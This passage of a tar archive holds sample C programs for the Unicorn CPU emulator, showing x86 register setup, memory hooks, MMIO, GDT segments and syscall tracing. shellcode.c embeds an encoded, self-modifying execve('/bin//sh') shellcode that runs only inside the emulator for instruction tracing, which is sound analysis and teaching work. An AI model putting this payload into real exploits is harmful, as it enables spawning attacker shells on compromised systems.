int64_t r10 = 0xec45774f00c5f682; int64_t r11 = 0xe17e9dbec8c074aa; int64_t r12 = 0x80f86a8dc0f6d457; int64_t r13 = 0x48288ca5671c5492; int64_t r14 = 0x595f72f6e4017f6e; int64_t r15 = 0x1efd97aea331cccc; int64_t rsp = ADDRESS + 0x200000; printf("Emulate x86_64 code\n"); // Initialize emulator in X86-64bit mode err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE64, sizeof(X86_CODE64) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_RSP, &rsp); uc_reg_write(uc, UC_X86_REG_RAX, &rax); uc_reg_write(uc, UC_X86_REG_RBX, &rbx); uc_reg_write(uc, UC_X86_REG_RCX, &rcx); uc_reg_write(uc, UC_X86_REG_RDX, &rdx); uc_reg_write(uc, UC_X86_REG_RSI, &rsi); uc_reg_write(uc, UC_X86_REG_RDI, &rdi); uc_reg_write(uc, UC_X86_REG_R8, &r8); uc_reg_write(uc, UC_X86_REG_R9, &r9); uc_reg_write(uc, UC_X86_REG_R10, &r10); uc_reg_write(uc, UC_X86_REG_R11, &r11); uc_reg_write(uc, UC_X86_REG_R12, &r12); uc_reg_write(uc, UC_X86_REG_R13, &r13); uc_reg_write(uc, UC_X86_REG_R14, &r14); uc_reg_write(uc, UC_X86_REG_R15, &r15); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instructions in the range [ADDRESS, ADDRESS+20] uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code64, NULL, ADDRESS, ADDRESS + 20); // tracing all memory WRITE access (with @begin > @end) uc_hook_add(uc, &trace3, UC_HOOK_MEM_WRITE, hook_mem64, NULL, 1, 0); // tracing all memory READ access (with @begin > @end) uc_hook_add(uc, &trace4, UC_HOOK_MEM_READ, hook_mem64, NULL, 1, 0); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE64) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. 
Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_RAX, &rax); uc_reg_read(uc, UC_X86_REG_RBX, &rbx); uc_reg_read(uc, UC_X86_REG_RCX, &rcx); uc_reg_read(uc, UC_X86_REG_RDX, &rdx); uc_reg_read(uc, UC_X86_REG_RSI, &rsi); uc_reg_read(uc, UC_X86_REG_RDI, &rdi); uc_reg_read(uc, UC_X86_REG_R8, &r8); uc_reg_read(uc, UC_X86_REG_R9, &r9); uc_reg_read(uc, UC_X86_REG_R10, &r10); uc_reg_read(uc, UC_X86_REG_R11, &r11); uc_reg_read(uc, UC_X86_REG_R12, &r12); uc_reg_read(uc, UC_X86_REG_R13, &r13); uc_reg_read(uc, UC_X86_REG_R14, &r14); uc_reg_read(uc, UC_X86_REG_R15, &r15); printf(">>> RAX = 0x%" PRIx64 "\n", rax); printf(">>> RBX = 0x%" PRIx64 "\n", rbx); printf(">>> RCX = 0x%" PRIx64 "\n", rcx); printf(">>> RDX = 0x%" PRIx64 "\n", rdx); printf(">>> RSI = 0x%" PRIx64 "\n", rsi); printf(">>> RDI = 0x%" PRIx64 "\n", rdi); printf(">>> R8 = 0x%" PRIx64 "\n", r8); printf(">>> R9 = 0x%" PRIx64 "\n", r9); printf(">>> R10 = 0x%" PRIx64 "\n", r10); printf(">>> R11 = 0x%" PRIx64 "\n", r11); printf(">>> R12 = 0x%" PRIx64 "\n", r12); printf(">>> R13 = 0x%" PRIx64 "\n", r13); printf(">>> R14 = 0x%" PRIx64 "\n", r14); printf(">>> R15 = 0x%" PRIx64 "\n", r15); uc_close(uc); } static void test_x86_64_syscall(void) { uc_engine *uc; uc_hook trace1; uc_err err; int64_t rax = 0x100; printf("Emulate x86_64 code with 'syscall' instruction\n"); // Initialize emulator in X86-64bit mode err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE64_SYSCALL, sizeof(X86_CODE64_SYSCALL) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // hook interrupts for syscall uc_hook_add(uc, &trace1, UC_HOOK_INSN, hook_syscall, NULL, 1, 0, UC_X86_INS_SYSCALL); // initialize machine registers uc_reg_write(uc, UC_X86_REG_RAX, &rax); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE64_SYSCALL) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_RAX, &rax); printf(">>> RAX = 0x%" PRIx64 "\n", rax); uc_close(uc); } static void test_x86_16(void) { uc_engine *uc; uc_err err; uint8_t tmp; int32_t eax = 7; int32_t ebx = 5; int32_t esi = 6; printf("Emulate x86 16-bit code\n"); // Initialize emulator in X86-16bit mode err = uc_open(UC_ARCH_X86, UC_MODE_16, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 8KB memory for this emulation uc_mem_map(uc, 0, 8 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, 0, X86_CODE16, sizeof(X86_CODE16) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_EAX, &eax); uc_reg_write(uc, UC_X86_REG_EBX, &ebx); uc_reg_write(uc, UC_X86_REG_ESI, &esi); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, 0, sizeof(X86_CODE16) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. 
Below is the CPU context\n");

    // read from memory
    if (!uc_mem_read(uc, 11, &tmp, 1))
        printf(">>> Read 1 byte from [0x%x] = 0x%x\n", 11, tmp);
    else
        printf(">>> Failed to read 1 byte from [0x%x]\n", 11);

    uc_close(uc);
}

static void test_i386_invalid_mem_read_in_tb(void)
{
    uc_engine *uc;
    uc_err err;
    uc_hook trace1;
    int r_eax = 0x1234; // EAX register
    int r_edx = 0x7890; // EDX register
    int r_eip = 0;

    printf(
        "Emulate i386 code that reads invalid memory in the middle of a TB\n");

    // Initialize emulator in X86-32bit mode
    err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
    if (err) {
        printf("Failed on uc_open() with error returned: %u\n", err);
        return;
    }

    // map 2MB memory for this emulation
    uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL);

    // write machine code to be emulated to memory
    if (uc_mem_write(uc, ADDRESS, X86_CODE32_MEM_READ_IN_TB,
                     sizeof(X86_CODE32_MEM_READ_IN_TB) - 1)) {
        printf("Failed to write emulation code to memory, quit!\n");
        return;
    }

    // initialize machine registers
    uc_reg_write(uc, UC_X86_REG_EAX, &r_eax);
    uc_reg_write(uc, UC_X86_REG_EDX, &r_edx);

    // Add a dummy callback.
    uc_hook_add(uc, &trace1, UC_HOOK_MEM_READ, hook_mem_invalid_dummy, NULL, 1,
                0);

    // Let it crash by design.
    err = uc_emu_start(uc, ADDRESS,
                       ADDRESS + sizeof(X86_CODE32_MEM_READ_IN_TB) - 1, 0, 0);
    if (err) {
        printf("uc_emu_start() failed BY DESIGN with error returned %u: %s\n",
               err, uc_strerror(err));
    }

    printf(">>> Emulation done. Below is the CPU context\n");

    uc_reg_read(uc, UC_X86_REG_EIP, &r_eip);
    printf(">>> EIP = 0x%x\n", r_eip);

    if (r_eip != ADDRESS + 1) {
        printf(">>> ERROR: Wrong PC 0x%x when reading unmapped memory in the "
               "middle of TB!\n",
               r_eip);
    } else {
        printf(">>> The PC is correct after reading unmapped memory in the "
               "middle of TB.\n");
    }

    uc_close(uc);
}

static void test_i386_smc_xor(void)
{
    uc_engine *uc;
    uc_err err;
    uint32_t r_edi = ADDRESS;    // EDI register
    uint32_t r_eax = 0xbc4177e6; // EAX register
    uint32_t result;

    printf("Emulate i386 code that modifies itself\n");

    // Initialize emulator in X86-32bit mode
    err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
    if (err) {
        printf("Failed on uc_open() with error returned: %u\n", err);
        return;
    }

    // map 4KB (0x1000 bytes) memory for this emulation
    uc_mem_map(uc, ADDRESS, 0x1000, UC_PROT_ALL);

    // write machine code to be emulated to memory
    if (uc_mem_write(uc, ADDRESS, X86_CODE32_SMC, sizeof(X86_CODE32_SMC) - 1)) {
        printf("Failed to write emulation code to memory, quit!\n");
        return;
    }

    // initialize machine registers
    uc_reg_write(uc, UC_X86_REG_EDI, &r_edi);
    uc_reg_write(uc, UC_X86_REG_EAX, &r_eax);

    // **Important Note**
    //
    // Since SMC code causes TB regeneration, the XOR is in fact executed
    // twice (the first execution won't take effect). Thus, if you would like
    // to use count to control the emulation, the count should be set to 2.
    //
    // err = uc_emu_start(uc, ADDRESS, ADDRESS + 3, 0, 0);
    err = uc_emu_start(uc, ADDRESS, 0, 0, 2);
    if (err) {
        printf("Failed on uc_emu_start() with error returned %u: %s\n", err,
               uc_strerror(err));
    }

    printf(">>> Emulation done. Below is the result.\n");

    uc_mem_read(uc, ADDRESS + 3, (void *)&result, 4);

    if (result == (0x3ea98b13 ^ 0xbc4177e6)) {
        printf(">>> SMC emulation is correct. 0x3ea98b13 ^ 0xbc4177e6 = 0x%x\n",
               result);
    } else {
        printf(">>> SMC emulation is wrong. 0x3ea98b13 ^ 0xbc4177e6 = 0x%x\n",
               result);
    }

    uc_close(uc);
}
static uint64_t mmio_read_callback(uc_engine *uc, uint64_t offset,
                                   unsigned size, void *user_data)
{
    printf(">>> Read IO memory at offset 0x%" PRIx64
           " with %u bytes and return 0x19260817\n",
           offset, size);
    // The value returned here will be written to ECX.
    return 0x19260817;
}

static void mmio_write_callback(uc_engine *uc, uint64_t offset, unsigned size,
                                uint64_t value, void *user_data)
{
    printf(">>> Write value 0x%" PRIx64 " to IO memory at offset 0x%" PRIx64
           " with %u bytes\n",
           value, offset, size);
    return;
}

static void test_i386_mmio(void)
{
    uc_engine *uc;
    int r_ecx = 0xdeadbeef;
    uc_err err;

    printf("Emulate i386 code that uses MMIO\n");

    // Initialize emulator in X86-32bit mode
    err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
    if (err) {
        printf("Failed on uc_open() with error returned: %u\n", err);
        return;
    }

    // map 4KB (0x1000 bytes) memory for this emulation
    err = uc_mem_map(uc, ADDRESS, 0x1000, UC_PROT_ALL);
    if (err) {
        printf("Failed on uc_mem_map() with error returned: %u\n", err);
        return;
    }

    // write machine code to be emulated to memory
    err = uc_mem_write(uc, ADDRESS, X86_MMIO_CODE, sizeof(X86_MMIO_CODE) - 1);
    if (err) {
        printf("Failed on uc_mem_write() with error returned: %u\n", err);
        return;
    }

    err = uc_mmio_map(uc, 0x20000, 0x4000, mmio_read_callback, NULL,
                      mmio_write_callback, NULL);
    if (err) {
        printf("Failed on uc_mmio_map() with error returned: %u\n", err);
        return;
    }

    // prepare ecx
    err = uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx);
    if (err) {
        printf("Failed on uc_reg_write() with error returned: %u\n", err);
        return;
    }

    err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_MMIO_CODE) - 1, 0, 0);
    if (err) {
        printf("Failed on uc_emu_start() with error returned: %u\n", err);
        return;
    }

    uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx);
    printf(">>> Emulation done. ECX=0x%x\n", r_ecx);

    uc_close(uc);
}

static bool test_i386_hook_mem_invalid_cb(uc_engine *uc, uc_mem_type type,
                                          uint64_t address, int size,
                                          uint64_t value, void *user_data)
{
    if (type == UC_MEM_READ_UNMAPPED || type == UC_MEM_WRITE_UNMAPPED) {
        printf(">>> We have to add a map at 0x%" PRIx64
               " before continuing execution!\n",
               address);
        uc_mem_map(uc, address, 0x1000, UC_PROT_ALL);
    }
    // If you really would like to continue the execution, make sure the
    // memory is already mapped properly!
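    // (Added note, per Unicorn's documented hook semantics:) the boolean
    // returned by an *_UNMAPPED hook means "retry the faulting access".
    // Returning true only works here because the callback mapped the missing
    // page above; returning false would abort emulation and uc_emu_start()
    // would report the matching UC_ERR_READ_UNMAPPED / UC_ERR_WRITE_UNMAPPED
    // error.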
return true; } static void test_i386_hook_mem_invalid(void) { uc_engine *uc; uc_hook hook; // mov eax, 0xdeadbeef; // mov [0x8000], eax; // mov eax, [0x10000]; char code[] = "\xb8\xef\xbe\xad\xde\xa3\x00\x80\x00\x00\xa1\x00\x00\x01\x00"; uc_err err; printf("Emulate i386 code that triggers invalid memory read/write.\n"); err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } err = uc_mem_map(uc, ADDRESS, 0x1000, UC_PROT_ALL); if (err) { printf("Failed on uc_mem_map() with error returned: %u\n", err); return; } err = uc_mem_write(uc, ADDRESS, code, sizeof(code) - 1); if (err) { printf("Failed on uc_mem_write() with error returned: %u\n", err); return; } err = uc_hook_add(uc, &hook, UC_HOOK_MEM_VALID | UC_HOOK_MEM_INVALID, test_i386_hook_mem_invalid_cb, NULL, 1, 0); if (err) { printf("Failed on uc_hook_add() with error returned: %u\n", err); return; } err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(code) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); return; } uc_hook_del(uc, hook); uc_close(uc); } int main(int argc, char **argv, char **envp) { if (argc == 2) { if (!strcmp(argv[1], "-16")) { test_x86_16(); } else if (!strcmp(argv[1], "-32")) { test_miss_code(); printf("===================================\n"); test_i386(); printf("===================================\n"); test_i386_map_ptr(); printf("===================================\n"); test_i386_inout(); printf("===================================\n"); test_i386_context_save(); printf("===================================\n"); test_i386_jump(); printf("===================================\n"); test_i386_loop(); printf("===================================\n"); test_i386_invalid_mem_read(); printf("===================================\n"); test_i386_invalid_mem_write(); printf("===================================\n"); test_i386_jump_invalid(); // test_i386_invalid_c6c7(); } else if (!strcmp(argv[1], "-64")) { test_x86_64(); printf("===================================\n"); test_x86_64_syscall(); } else if (!strcmp(argv[1], "-h")) { printf("Syntax: %s <-16|-32|-64>\n", argv[0]); } } else { test_x86_16(); printf("===================================\n"); test_miss_code(); printf("===================================\n"); test_i386(); printf("===================================\n"); test_i386_map_ptr(); printf("===================================\n"); test_i386_inout(); printf("===================================\n"); test_i386_context_save(); printf("===================================\n"); test_i386_jump(); printf("===================================\n"); test_i386_loop(); printf("===================================\n"); test_i386_invalid_mem_read(); printf("===================================\n"); test_i386_invalid_mem_write(); printf("===================================\n"); test_i386_jump_invalid(); // test_i386_invalid_c6c7(); printf("===================================\n"); test_x86_64(); printf("===================================\n"); test_x86_64_syscall(); printf("===================================\n"); test_i386_invalid_mem_read_in_tb(); printf("===================================\n"); test_i386_smc_xor(); printf("===================================\n"); test_i386_mmio(); printf("===================================\n"); test_i386_hook_mem_invalid(); } return 0; } 
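/*
 * Build/run sketch (editor's addition; the output file name is illustrative
 * and the library flags assume a system-wide Unicorn install, so they may
 * differ locally):
 *
 *   cc -o sample_x86 sample_x86.c -lunicorn -lpthread
 *   ./sample_x86 -16   # only the 16-bit test
 *   ./sample_x86 -32   # only the 32-bit tests
 *   ./sample_x86 -64   # only the 64-bit tests
 *
 * Run with no argument, main() above executes every test in sequence,
 * separated by the "===" banners.
 */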
���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_x86_32_gdt_and_seg_regs.c����������������������������������������������0000664�0000000�0000000�00000023370�14675241067�0022651�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Sample code to setup a GDT, and use segments. Copyright(c) 2016 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ #include <unicorn/unicorn.h> #include <string.h> #include <assert.h> #include <stdlib.h> #pragma pack(push, 1) struct SegmentDescriptor { union { struct { #if __BYTE_ORDER == __LITTLE_ENDIAN unsigned short limit0; unsigned short base0; unsigned char base1; unsigned char type : 4; unsigned char system : 1; /* S flag */ unsigned char dpl : 2; unsigned char present : 1; /* P flag */ unsigned char limit1 : 4; unsigned char avail : 1; unsigned char is_64_code : 1; /* L flag */ unsigned char db : 1; /* DB flag */ unsigned char granularity : 1; /* G flag */ unsigned char base2; #else unsigned char base2; unsigned char granularity : 1; /* G flag */ unsigned char db : 1; /* DB flag */ unsigned char is_64_code : 1; /* L flag */ unsigned char avail : 1; unsigned char limit1 : 4; unsigned char present : 1; /* P flag */ unsigned char dpl : 2; unsigned char system : 1; /* S flag */ unsigned char type : 4; unsigned char base1; unsigned short base0; unsigned short limit0; #endif }; uint64_t desc; }; }; #pragma pack(pop) #define SEGBASE(d) \ ((uint32_t)((((d).desc >> 16) & 0xffffff) | \ (((d).desc >> 32) & 0xff000000))) #define SEGLIMIT(d) ((d).limit0 | (((unsigned int)(d).limit1) << 16)) /** * Assert that err matches expect */ #define uc_assert_err(expect, err) \ do { \ uc_err __err = err; \ if (__err != expect) { \ fprintf(stderr, "%s", uc_strerror(__err)); \ exit(1); \ } \ } while (0) /** * Assert that err is UC_ERR_OK */ #define uc_assert_success(err) uc_assert_err(UC_ERR_OK, err) /** * Assert that err is anything but UC_ERR_OK * * Note: Better to use uc_assert_err(<specific error>, err), * as this serves to document which errors a function will return * in various scenarios. 
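 *
 * Illustrative example (added; a write to unmapped memory is the kind of
 * call that fails with a specific, documented code, here
 * UC_ERR_WRITE_UNMAPPED):
 *
 *   uc_assert_err(UC_ERR_WRITE_UNMAPPED,
 *                 uc_mem_write(uc, 0xdeadbeef, buf, sizeof(buf)));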
*/ #define uc_assert_fail(err) \ do { \ uc_err __err = err; \ if (__err == UC_ERR_OK) { \ fprintf(stderr, "%s", uc_strerror(__err)); \ exit(1); \ } \ } while (0) #define OK(x) uc_assert_success(x) /******************************************************************************/ static void hook_mem(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { switch (type) { case UC_MEM_WRITE: printf("mem write at 0x%" PRIx64 ", size = %u, value = 0x%" PRIx64 "\n", address, size, value); break; default: break; } } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("Executing at 0x%" PRIx64 ", ilen = 0x%x\n", address, size); } // VERY basic descriptor init function, sets many fields to user space sane // defaults static void init_descriptor(struct SegmentDescriptor *desc, uint32_t base, uint32_t limit, uint8_t is_code) { desc->desc = 0; // clear the descriptor desc->base0 = base & 0xffff; desc->base1 = (base >> 16) & 0xff; desc->base2 = base >> 24; if (limit > 0xfffff) { // need Giant granularity limit >>= 12; desc->granularity = 1; } desc->limit0 = limit & 0xffff; desc->limit1 = limit >> 16; // some sane defaults desc->dpl = 3; desc->present = 1; desc->db = 1; // 32 bit desc->type = is_code ? 0xb : 3; desc->system = 1; // code or data } /* static void hex_dump(unsigned char *ptr, unsigned int len) { int i; for (i = 0; i < len; i++) { if (i != 0 && (i & 0xf) == 0) { fprintf(stderr, "\n"); } fprintf(stderr, "%02hhx", ptr[i]); } fprintf(stderr, "\n"); } */ static void gdt_demo(void) { uc_engine *uc; uc_hook hook1, hook2; uc_err err; uint8_t buf[128]; uc_x86_mmr gdtr; int i; /* bits 32 push dword 0x01234567 push dword 0x89abcdef mov dword [fs:0], 0x01234567 mov dword [fs:4], 0x89abcdef */ const uint8_t code[] = "\x68\x67\x45\x23\x01\x68\xef\xcd\xab\x89\x64\xc7\x05\x00\x00\x00\x00" "\x67\x45\x23\x01\x64\xc7\x05\x04\x00\x00\x00\xef\xcd\xab\x89"; const uint64_t code_address = 0x1000000; const uint64_t stack_address = 0x120000; const uint64_t gdt_address = 0xc0000000; const uint64_t fs_address = 0x7efdd000; struct SegmentDescriptor *gdt = (struct SegmentDescriptor *)calloc( 31, sizeof(struct SegmentDescriptor)); int r_esp = (int)stack_address + 0x1000; // initial esp int r_cs = 0x73; int r_ss = 0x88; // ring 0 int r_ds = 0x7b; int r_es = 0x7b; int r_fs = 0x83; gdtr.base = gdt_address; gdtr.limit = 31 * sizeof(struct SegmentDescriptor) - 1; init_descriptor(&gdt[14], 0, 0xfffff000, 1); // code segment init_descriptor(&gdt[15], 0, 0xfffff000, 0); // data segment init_descriptor(&gdt[16], 0x7efdd000, 0xfff, 0); // one page data segment simulate fs init_descriptor(&gdt[17], 0, 0xfffff000, 0); // ring 0 data gdt[17].dpl = 0; // set descriptor privilege level /* fprintf(stderr, "GDT: \n"); hex_dump((unsigned char*)gdt, 31 * sizeof(struct SegmentDescriptor)); */ // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); uc_assert_success(err); uc_hook_add(uc, &hook1, UC_HOOK_CODE, hook_code, NULL, code_address, code_address + sizeof(code) - 1); err = uc_hook_add(uc, &hook2, UC_HOOK_MEM_WRITE, hook_mem, NULL, (uint64_t)1, (uint64_t)0); uc_assert_success(err); // map 1 page of code for this emulation err = uc_mem_map(uc, code_address, 0x1000, UC_PROT_ALL); uc_assert_success(err); // map 1 page of stack for this emulation err = uc_mem_map(uc, stack_address, 0x1000, UC_PROT_READ | UC_PROT_WRITE); uc_assert_success(err); // map 64k for a GDT err = uc_mem_map(uc, gdt_address, 0x10000, UC_PROT_WRITE | 
UC_PROT_READ); uc_assert_success(err); // set up a GDT BEFORE you manipulate any segment registers err = uc_reg_write(uc, UC_X86_REG_GDTR, &gdtr); uc_assert_success(err); // write gdt to be emulated to memory err = uc_mem_write(uc, gdt_address, gdt, 31 * sizeof(struct SegmentDescriptor)); uc_assert_success(err); // map 1 page for FS err = uc_mem_map(uc, fs_address, 0x1000, UC_PROT_WRITE | UC_PROT_READ); uc_assert_success(err); // write machine code to be emulated to memory err = uc_mem_write(uc, code_address, code, sizeof(code) - 1); uc_assert_success(err); // initialize machine registers err = uc_reg_write(uc, UC_X86_REG_ESP, &r_esp); uc_assert_success(err); // when setting SS, need rpl == cpl && dpl == cpl // emulator starts with cpl == 0, so we need a dpl 0 descriptor and rpl 0 // selector err = uc_reg_write(uc, UC_X86_REG_SS, &r_ss); uc_assert_success(err); err = uc_reg_write(uc, UC_X86_REG_CS, &r_cs); uc_assert_success(err); err = uc_reg_write(uc, UC_X86_REG_DS, &r_ds); uc_assert_success(err); err = uc_reg_write(uc, UC_X86_REG_ES, &r_es); uc_assert_success(err); err = uc_reg_write(uc, UC_X86_REG_FS, &r_fs); uc_assert_success(err); // emulate machine code in infinite time err = uc_emu_start(uc, code_address, code_address + sizeof(code) - 1, 0, 0); uc_assert_success(err); // read from memory err = uc_mem_read(uc, r_esp - 8, buf, 8); uc_assert_success(err); for (i = 0; i < 8; i++) { fprintf(stderr, "%02x", buf[i]); } fprintf(stderr, "\n"); assert(memcmp(buf, "\xef\xcd\xab\x89\x67\x45\x23\x01", 8) == 0); // read from memory err = uc_mem_read(uc, fs_address, buf, 8); uc_assert_success(err); assert(memcmp(buf, "\x67\x45\x23\x01\xef\xcd\xab\x89", 8) == 0); uc_close(uc); free(gdt); } /******************************************************************************/ int main(int argc, char **argv) { gdt_demo(); fprintf(stderr, "success\n"); return 0; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/shellcode.c�������������������������������������������������������������������0000664�0000000�0000000�00000011334�14675241067�0016760�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh & Dang Hoang Vu, 2015 */ /* Sample code to trace code with Linux code with syscall */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated #define X86_CODE32 \ "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd" \ "\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c" \ "\x6f" #define X86_CODE32_SELF \ "\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89" \ "\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31" \ "\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" \ "\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41\x41\x41\x41\x41" // memory address where emulation starts #define ADDRESS 0x1000000 #define MIN(a, b) (a < b ? 
a : b) // callback for tracing instruction static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { int r_eip; uint8_t tmp[16]; printf("Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); uc_reg_read(uc, UC_X86_REG_EIP, &r_eip); printf("*** EIP = %x ***: ", r_eip); size = MIN(sizeof(tmp), size); if (!uc_mem_read(uc, address, tmp, size)) { uint32_t i; for (i = 0; i < size; i++) { printf("%x ", tmp[i]); } printf("\n"); } } // callback for handling interrupt // ref: http://syscalls.kernelgrok.com/ static void hook_intr(uc_engine *uc, uint32_t intno, void *user_data) { int32_t r_eax, r_ecx, r_eip; uint32_t r_edx, size; unsigned char buffer[256]; // only handle Linux syscall if (intno != 0x80) return; uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); uc_reg_read(uc, UC_X86_REG_EIP, &r_eip); switch (r_eax) { default: printf(">>> 0x%x: interrupt 0x%x, EAX = 0x%x\n", r_eip, intno, r_eax); break; case 1: // sys_exit printf(">>> 0x%x: interrupt 0x%x, SYS_EXIT. quit!\n\n", r_eip, intno); uc_emu_stop(uc); break; case 4: // sys_write // ECX = buffer address uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); // EDX = buffer size uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); // read the buffer in size = MIN(sizeof(buffer) - 1, r_edx); if (!uc_mem_read(uc, r_ecx, buffer, size)) { buffer[size] = '\0'; printf(">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = " "%u, content = '%s'\n", r_eip, intno, r_ecx, r_edx, buffer); } else { printf(">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = " "%u (cannot get content)\n", r_eip, intno, r_ecx, r_edx); } break; } } static void test_i386(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r_esp = ADDRESS + 0x200000; // ESP register printf("Emulate i386 code\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_SELF, sizeof(X86_CODE32_SELF) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_ESP, &r_esp); // tracing all instructions by having @begin > @end uc_hook_add(uc, &trace1, UC_HOOK_CODE, hook_code, NULL, 1, 0); // handle interrupt ourself uc_hook_add(uc, &trace2, UC_HOOK_INTR, hook_intr, NULL, 1, 0); printf("\n>>> Start tracing this Linux code\n"); // emulate machine code in infinite time // err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_SELF), 0, // 12); <--- emulate only 12 instructions err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_SELF) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } printf("\n>>> Emulation done.\n"); uc_close(uc); } int main(int argc, char **argv, char **envp) { if (argc == 2) { if (!strcmp(argv[1], "-32")) { test_i386(); } else if (!strcmp(argv[1], "-h")) { printf("Syntax: %s <-32|-64>\n", argv[0]); } } else { test_i386(); } return 0; } 
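/*
 * Editor's note: hook_intr() above decodes the standard Linux i386
 * int 0x80 calling convention (OS ABI, not something Unicorn defines):
 *
 *   EAX = syscall number (1 = sys_exit, 4 = sys_write)
 *   EBX/ECX/EDX = first three arguments; for sys_write:
 *     EBX = fd, ECX = buffer address, EDX = byte count
 *
 * which is why the callback reads ECX and EDX to recover and print the
 * emulated shellcode's write buffer.
 */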
